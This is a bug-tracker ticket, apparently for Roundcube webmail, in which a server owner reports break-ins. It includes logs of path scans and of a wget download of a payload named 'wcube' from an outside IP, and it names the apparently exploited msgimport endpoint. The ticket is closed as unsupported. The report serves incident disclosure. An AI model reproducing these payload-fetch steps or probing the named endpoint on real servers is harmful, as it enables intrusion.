Opened 4 years ago
Closed 4 years ago
#1485677 closed Bugs (wontfix)
Break-in possiblity
| Reported by: | dpecile | Owned by: | |
|---|---|---|---|
| Priority: | 1 - Highest | Milestone: | later |
| Component: | Security | Version: | 0.2-stable |
| Severity: | critical | Keywords: | |
| Cc: |
Description
Hi
I have 2 atacks in diferents servers in diferent countrys.
I only have the logs.
But I am seeing more scans in the following days.
I don't see any info here or in the forums.
Anyone have more of this attacks ?
Regards
Demian
[Thu Jan 08 03:15:10 2009] [error] [client 85.112.3.77] File does not exist: /var/www/nonexistenshit
[Thu Jan 08 03:15:10 2009] [error] [client 85.112.3.77] File does not exist: /var/www/mail
[Thu Jan 08 03:15:10 2009] [error] [client 85.112.3.77] File does not exist: /var/www/bin
[Thu Jan 08 03:15:10 2009] [error] [client 85.112.3.77] File does not exist: /var/www/rc
[Thu Jan 08 03:15:11 2009] [error] [client 85.112.3.77] File does not exist: /var/www/roundcube
--03:15:13-- http://85.214.64.225/wcube
=> `wcube'
Connecting to 85.214.64.225:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 667,756 (652K) [text/plain]
0K .......... .......... .......... .......... .......... 7% 68.37 KB/s
50K .......... .......... .......... .......... .......... 15% 143.12 KB/s
100K .......... .......... .......... .......... .......... 23% 8.02 MB/s
150K .......... .......... .......... .......... .......... 30% 288.47 KB/s
200K .......... .......... .......... .......... .......... 38% 291.68 KB/s
250K .......... .......... .......... .......... .......... 46% 8.06 MB/s
300K .......... .......... .......... .......... .......... 53% 5.43 MB/s
350K .......... .......... .......... .......... .......... 61% 309.85 KB/s
400K .......... .......... .......... .......... .......... 69% 7.43 MB/s
450K .......... .......... .......... .......... .......... 76% 4.26 MB/s
500K .......... .......... .......... .......... .......... 84% 4.86 MB/s
550K .......... .......... .......... .......... .......... 92% 327.15 KB/s
600K .......... .......... .......... .......... .......... 99% 7.42 MB/s
650K .. 100% 1.03 MB/s
03:15:32 (363.20 KB/s) - `wcube' saved [667756/667756]
Change History (4)
comment:1 Changed 4 years ago by dpecile
- Component changed from Addressbook to Security issue
- Priority changed from 5 to 1 - Highest
- Severity changed from normal to critical
comment:2 Changed 4 years ago by alec
comment:3 Changed 4 years ago by dpecile
0.1.1 and apparently the exploit is in GET /webmail/bin/msgimport
I don't have more logs, but in this page I see more samples
http://www.webhostingtalk.com/showthread.php?t=748555&page=3
comment:4 Changed 4 years ago by alec
- Resolution set to wontfix
- Status changed from new to closed
We do not support 0.1.1 now. Upgrade to 0.2-stable.
Are you use 0.2-stable? We need more logs.